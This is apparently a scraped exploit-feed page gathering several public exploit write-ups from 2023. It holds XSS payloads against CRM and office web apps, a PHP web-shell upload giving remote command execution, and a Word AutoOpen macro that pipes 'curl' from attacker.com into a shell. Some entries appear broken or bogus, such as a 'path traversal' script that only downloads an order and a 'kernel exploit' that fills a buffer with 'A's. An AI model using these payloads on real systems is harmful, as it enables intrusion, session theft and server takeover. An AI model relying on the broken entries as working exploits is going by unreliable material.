Latest exploits :: CodePwn

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : https://onesttech.com/details/crm │ │ Vendor : Onest Tech │ │ Software : ONEST CRM 1.0 - Customer Relationship Management System Software │ │ Vuln Type: Stored XSS │ │ Impact : Manipulate the content of the site │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ Allow Attacker to inject malicious code into website, give ability to steal sensitive │ │ information, manipulate data, and launch additional attacks. │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ## Stored XSS ------------------------------------------------------------ POST /admin/project/update/2 HTTP/2 Content-Disposition: form-data; name="name" <script>alert(1)</script> ------------------------------------------------------------ POST parameter 'name' is vulnerable to XSS ## Steps to Reproduce: 1. Login (as Client) "Normal User" 2. Go to [Project List] on this Path (https://website/admin/project) 3. Select any Project Click on the ... then Select [Edit] 4. Inject your [XSS Payload] in "Name" 5. Scroll Down and Press [Update] 6. XSS Will Fire on Client Browser 5. When ADMIN Visit the [Project List] to Check the Projects on this Path (https://website/admin/project) in administration Panel 6. XSS will Fire & Executed on his Browser Note: the Path for [Client Users] and [ADMIN] on the website it looks the same on "/admin/" but The Client User Panel is Limited & don't show all Administration MENU Options in the Administration Panel to manage the website [-] Done </code></pre>

<pre><code># Exploit Title: Office Suite Premium 10.9.1.42602 - Cross-Site Scripting (reflected) # Date: 06-26-2023 # Exploit Author: tmrswrr # Vendor Homepage: https://www.mobisystems.com/ # Software Link: https://apps.apple.com/us/app/officesuite-docs-pdf-editor/id924005506 # Version: Office Suite Premium 10.9.1.42602 # Tested on: Ubuntu 18.04 # POC # Exploit Details : Following request will create a tool with an XSS payload. Click on the URL link for the malicious tool to trigger the payload. Request 1: GET /api?path=profile&lang=en_EN&application=wynq8%3cimg%20src%3da%20onerror%3dalert(1)%3egik2hgdc3o2&command=issue-xchange-code HTTP/2 Host: connect.mobisystems.com Accept: */* Clv: 42602 Pushtkn: msc://CD3D8C6E-A727-4674-A1AB-B4455990B4A7:com.mobisystems.ios.office.free Accept-Language: en_EN,en;q=0.9 Accept-Encoding: gzip, deflate App: com.mobisystems.ios.office.free User-Agent: OfficeSuiteFree2/42602 CFNetwork/1404.0.5 Darwin/22.3.0 Gdpr: true Account: 234c89ff-7e80-4b64-9d35-8653fe131795 Tkn: 3cb5e874-51a4-4526-96d5-82c6321fdd19 Url: https://connect.mobisystems.com/api?path=profile&lang=en_EN&application=wynq8%3cimg%20src%3da%20onerror%3dalert(1)%3egik2hgdc3o2&command=issue-xchange-code Payload: <img src=a onerror=alert(1)> Parameter : application Request 2 : GET /api?path=files&id=dfsse%3cimg%20src%3da%20onerror%3dalert(1)%3ez1668cyj2pi&revision=%22%22&type=%22thumb%22&command=url&expires=1687785968527 HTTP/2 Host: connect.mobisystems.com Accept: */* Clv: 42602 Pushtkn: msc://CD3D8C6E-A727-4674-A1AB-B4455990B4A7:com.mobisystems.ios.office.free Accept-Language: en_EN,en;q=0.9 Accept-Encoding: gzip, deflate App: com.mobisystems.ios.office.free User-Agent: OfficeSuiteFree2/42602 CFNetwork/1404.0.5 Darwin/22.3.0 Lang: en_EN Gdpr: true Account: 234c89ff-7e80-4b64-9d35-8653fe131795 Tkn: 3cb5e874-51a4-4526-96d5-82c6321fdd19 URL : https://connect.mobisystems.com/api?path=files&id=dfsse%3cimg%20src%3da%20onerror%3dalert(1)%3ez1668cyj2pi&revision=%22%22&type=%22thumb%22&command=url&expires=1687785968527 Payload : <img src=a onerror=alert(1)> Parameter: id Request 3 : GET /api?path=files&filter=pt3gh%3cimg%20src%3da%20onerror%3dalert(1)%3ei22b7eyyoi2&options=%7B%22order%22%3Anull%2C%22size%22%3A100%2C%22cursor%22%3Anull%7D&root=%7B%22account%22%3A%22234c89ff-7e80-4b64-9d35-8653fe131795%22%2C%22key%22%3Anull%2C%22name%22%3Anull%2C%22parent%22%3Anull%7D&command=search HTTP/2 Host: connect.mobisystems.com Accept: */* Clv: 42602 Pushtkn: msc://CD3D8C6E-A727-4674-A1AB-B4455990B4A7:com.mobisystems.ios.office.free Accept-Language: en_EN,en;q=0.9 Accept-Encoding: gzip, deflate App: com.mobisystems.ios.office.free User-Agent: OfficeSuiteFree2/42602 CFNetwork/1404.0.5 Darwin/22.3.0 Lang: en_EN Gdpr: true Account: 234c89ff-7e80-4b64-9d35-8653fe131795 Tkn: 3cb5e874-51a4-4526-96d5-82c6321fdd19 URL : https://connect.mobisystems.com/api?path=files&filter=pt3gh%3cimg%20src%3da%20onerror%3dalert(1)%3ei22b7eyyoi2&options=%7B%22order%22%3Anull%2C%22size%22%3A100%2C%22cursor%22%3Anull%7D&root=%7B%22account%22%3A%22234c89ff-7e80-4b64-9d35-8653fe131795%22%2C%22key%22%3Anull%2C%22name%22%3Anull%2C%22parent%22%3Anull%7D&command=search Payload :<img src=a onerror=alert(1)> Parameter: filter </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : https://magicai.liquid-themes.com/ │ │ Vendor : MagicAI │ │ Software : MagicAI 1.55R │ │ Vuln Type: Stored XSS via File Upload │ │ Impact : Manipulate the content of the site │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ │ │ Allow Attacker to inject malicious code into website, give ability to steal sensitive │ │ information, manipulate data, and launch additional attacks. │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09 CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ## Steps to Reproduce: 1. Go to [Settings] on this Path (https://website/dashboard/user/settings) 2. Upload any Image in Avatar to capture the request in Burp Suite 3. Replace image.png with image.svg in [filename] and add this SVG with HTML Included ---------------------------------------------------------------------------------------- POST /dashboard/user/settings/save HTTP/2 Content-Disposition: form-data; name="avatar"; filename="image.svg" Content-Type: image/png <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 96 105"> <html><head><title>test</title></head><body><script>alert('xss');</script></body></html> </svg> ---------------------------------------------------------------------------------------- 4. Send the Request 5. Back to the Path (https://website/dashboard/user/settings) 6. Refresh the Page 7. Capture the Link of your Uploaded svg in [Burp Logger] GET (https://website/upload/images/avatar/****-culote-mia-avatar.svg) 8. Send SVG Link to Victims 9. XSS Executed! [-] Done </code></pre>

<pre><code>## Title: Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 64-bit Remote Code Execution Vulnerability ## Author: nu11secur1ty ## Date: 04.17.2023 ## Vendor: https://www.microsoft.com/ ## Software: https://www.microsoft.com/en-us/microsoft-365/ ## Reference: https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/ ## CVE-2023-28285 ## Description: The attack itself is carried out locally by a user with authentication to the targeted system. An attacker could exploit the vulnerability by convincing a victim, through social engineering, to download and open a specially crafted file from a website which could lead to a local attack on the victim's computer. The attacker can trick the victim to open a malicious web page by using a malicious `Word` file for `Office-365 API`. After the user will open the file to read it, from the API of Office-365, without being asked what it wants to activate, etc, he will activate the code of the malicious server, which he will inject himself, from this malicious server. Emedietly after this click, the attacker can receive very sensitive information! For bank accounts, logs from some sniff attacks, tracking of all the traffic of the victim without stopping, and more malicious stuff, it depends on the scenario and etc. STATUS: HIGH Vulnerability [+]Exploit: The exploit server must be BROADCASTING at the moment when the victim hit the button of the exploit! [+]PoC: ```cmd Sub AutoOpen() Call Shell("cmd.exe /S /c" & "curl -s http://attacker.com/CVE-2023-28285/PoC.debelui | debelui", vbNormalFocus) End Sub ``` ## FYI: The PoC has a price and this report will be uploaded with a description and video of how you can reproduce it only. ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-28285) ## Proof and Exploit [href](https://www.nu11secur1ty.com/2023/04/cve-2023-28285-microsoft-office-remote.html) ## Time spend: 01:30:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : https://demo.smartwebinfotech.site/job-board/ │ │ Vendor : Smartweb Infotech │ │ Software : Job Board 1.0 - Job Portal Management System │ │ Vuln Type: Arbitrary File Upload Leads to RCE │ │ Impact : Upload PHPshell and execute commands on the server │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ │ │ Allow Attacker to overwrite critical files simply by uploading a shell and execute │ │ commands on the server │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09 CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ## Steps to Reproduce: 1. Go to [My Profile] on this Path (https://website/settings/account) 2. Upload any Image to capture the request in Burp Suite 3. Replace image.png to upload.php in [filename] and add this simple phpshell POST /job-board/settings/account HTTP/2 -----------------------------427088175318086545183087924022 Content-Disposition: form-data; name="profile"; filename="shell.php" Content-Type: image/png <?php echo system($_GET['command']); ?> -----------------------------427088175318086545183087924022-- 4. Send the Request 5. Back to the Path (https://website/settings/account) 6. Refresh the Page 7. Copy the Link of (Unloaded Image) 8. Paste the Link of your uploaded PHPshell - Path (https://website/storage/upload/profile/shell_1687559183.php?command=id) 9. RCE Executed! [-] Done </code></pre>

<pre><code># Exploit Title: PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory # Date: 2023-06-20 # Dork: /modules/winbizpayment/downloads/download.php # country: Iran # Exploit Author: Amirhossein Bahramizadeh # Category : webapps # Vendor Homepage: https://shop.webbax.ch/modules-pour-winbiz/153-module-prestashop-winbiz-payment-reverse.html # Version: 17.1.3 (REQUIRED) # Tested on: Windows/Linux # CVE : CVE-2023-30198 import requests import string import random # The base URL of the vulnerable site base_url = "http://example.com" # The URL of the login page login_url = base_url + "/authentication.php" # The username and password for the admin account username = "admin" password = "password123" # The URL of the vulnerable download.php file download_url = base_url + "/modules/winbizpayment/downloads/download.php" # The ID of the order to download order_id = 1234 # The path to save the downloaded file file_path = "/tmp/order_%d.pdf" % order_id # The session cookies to use for the requests session_cookies = None # Generate a random string for the CSRF token csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32)) # Send a POST request to the login page to authenticate as the admin user login_data = {"email": username, "passwd": password, "csrf_token": csrf_token} session = requests.Session() response = session.post(login_url, data=login_data) # Save the session cookies for future requests session_cookies = session.cookies.get_dict() # Generate a random string for the CSRF token csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32)) # Send a POST request to the download.php file to download the order PDF download_data = {"id_order": order_id, "csrf_token": csrf_token} response = session.post(download_url, cookies=session_cookies, data=download_data) # Save the downloaded file to disk with open(file_path, "wb") as f: f.write(response.content) # Print a message indicating that the file has been downloaded print("File downloaded to %s" % file_path) </code></pre>

<pre><code>// Exploit Title: Windows 11 22h2 - Kernel Privilege Elevation // Date: 2023-06-20 // country: Iran // Exploit Author: Amirhossein Bahramizadeh // Category : webapps // Vendor Homepage: // Tested on: Windows/Linux // CVE : CVE-2023-28293 #include <windows.h> #include <stdio.h> // The vulnerable driver file name const char *driver_name = "vuln_driver.sys"; // The vulnerable driver device name const char *device_name = "\\\\.\\VulnDriver"; // The IOCTL code to trigger the vulnerability #define IOCTL_VULN_CODE 0x222003 // The buffer size for the IOCTL input/output data #define IOCTL_BUFFER_SIZE 0x1000 int main() { HANDLE device; DWORD bytes_returned; char input_buffer[IOCTL_BUFFER_SIZE]; char output_buffer[IOCTL_BUFFER_SIZE]; // Load the vulnerable driver if (!LoadDriver(driver_name, "\\Driver\\VulnDriver")) { printf("Error loading vulnerable driver: %d\n", GetLastError()); return 1; } // Open the vulnerable driver device device = CreateFile(device_name, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (device == INVALID_HANDLE_VALUE) { printf("Error opening vulnerable driver device: %d\n", GetLastError()); return 1; } // Fill the input buffer with data to trigger the vulnerability memset(input_buffer, 'A', IOCTL_BUFFER_SIZE); // Send the IOCTL to trigger the vulnerability if (!DeviceIoControl(device, IOCTL_VULN_CODE, input_buffer, IOCTL_BUFFER_SIZE, output_buffer, IOCTL_BUFFER_SIZE, &bytes_returned, NULL)) { printf("Error sending IOCTL: %d\n", GetLastError()); return 1; } // Print the output buffer contents printf("Output buffer:\n%s\n", output_buffer); // Unload the vulnerable driver if (!UnloadDriver("\\Driver\\VulnDriver")) { printf("Error unloading vulnerable driver: %d\n", GetLastError()); return 1; } // Close the vulnerable driver device CloseHandle(device); return 0; } BOOL LoadDriver(LPCTSTR driver_name, LPCTSTR service_name) { SC_HANDLE sc_manager, service; DWORD error; // Open the Service Control Manager sc_manager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS); if (sc_manager == NULL) { return FALSE; } // Create the service service = CreateService(sc_manager, service_name, service_name, SERVICE_ALL_ACCESS, SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL, driver_name, NULL, NULL, NULL, NULL, NULL); if (service == NULL) { error = GetLastError(); if (error == ERROR_SERVICE_EXISTS) { // The service already exists, so open it instead service = OpenService(sc_manager, service_name, SERVICE_ALL_ACCESS); if (service == NULL) { CloseServiceHandle(sc_manager); return FALSE; } } else { CloseServiceHandle(sc_manager); return FALSE; } } // Start the service if (!StartService(service, 0, NULL)) { error = GetLastError(); if (error != ERROR_SERVICE_ALREADY_RUNNING) { CloseServiceHandle(service); CloseServiceHandle(sc_manager); return FALSE; } } CloseServiceHandle(service); CloseServiceHandle(sc_manager); return TRUE; } BOOL UnloadDriver(LPCTSTR service_name) { SC_HANDLE sc_manager, service; SERVICE_STATUS status; DWORD error; // Open the Service Control Manager sc_manager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS); if (sc_manager == NULL) { return FALSE; } // Open the service service = OpenService(sc_manager, service_name, SERVICE_ALL_ACCESS); if (service == NULL) { CloseServiceHandle(sc_manager); return FALSE; } // Stop the service if (!ControlService(service, SERVICE_CONTROL_STOP, &status)) { error = GetLastError(); if (error != ERROR_SERVICE_NOT_ACTIVE) { CloseServiceHandle(service); CloseServiceHandle(sc_manager); return FALSE; } } // Delete the service if (!DeleteService(service)) { CloseServiceHandle(service); CloseServiceHandle(sc_manager); return FALSE; } CloseServiceHandle(service); CloseServiceHandle(sc_manager); return TRUE; } </code></pre>